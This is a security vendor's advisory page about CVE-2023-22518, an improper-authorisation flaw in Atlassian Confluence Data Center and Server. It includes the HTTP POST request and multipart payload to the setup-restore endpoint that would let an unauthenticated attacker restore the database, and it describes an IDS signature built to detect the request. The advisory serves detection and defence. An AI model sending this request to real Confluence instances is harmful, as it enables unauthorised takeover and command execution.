top of page

Atlassian Confluence Data Center and Server Security Bypass (CVE-2023-22518)



Application Details

All versions of Confluence Data Center and Server are affected by this vulnerability.


Vulnerability

Atlassian Confluence Data Center and Server could allow a remote attacker to bypass security restrictions, caused by an improper authorisation vulnerability.


Identification

This vulnerability could potentially allow unauthenticated attackers with network access to the Confluence Instance. Allowing them to restore the database of the Confluence instance, and eventually execute arbitrary system commands.


POST /json/setup-restore.action?synchronous=true 

PAYLOAD - 
------WebKitFormBoundaryT3yekvo0rGaL9QR7
Content-Disposition: form-data; name="buildIndex"

true
------WebKitFormBoundaryT3yekvo0rGaL9QR7
Content-Disposition: form-data; name="file";filename="jydrmjddgw.zip"

jydrmjddgw
------WebKitFormBoundaryT3yekvo0rGaL9QR7
Content-Disposition: form-data; name="edit"

Upload and import
------WebKitFormBoundaryT3yekvo0rGaL9QR7--

Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary system commands.


Coverage

Idappcom have created signature 8024362 along with a traffic file for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

Commentaires


bottom of page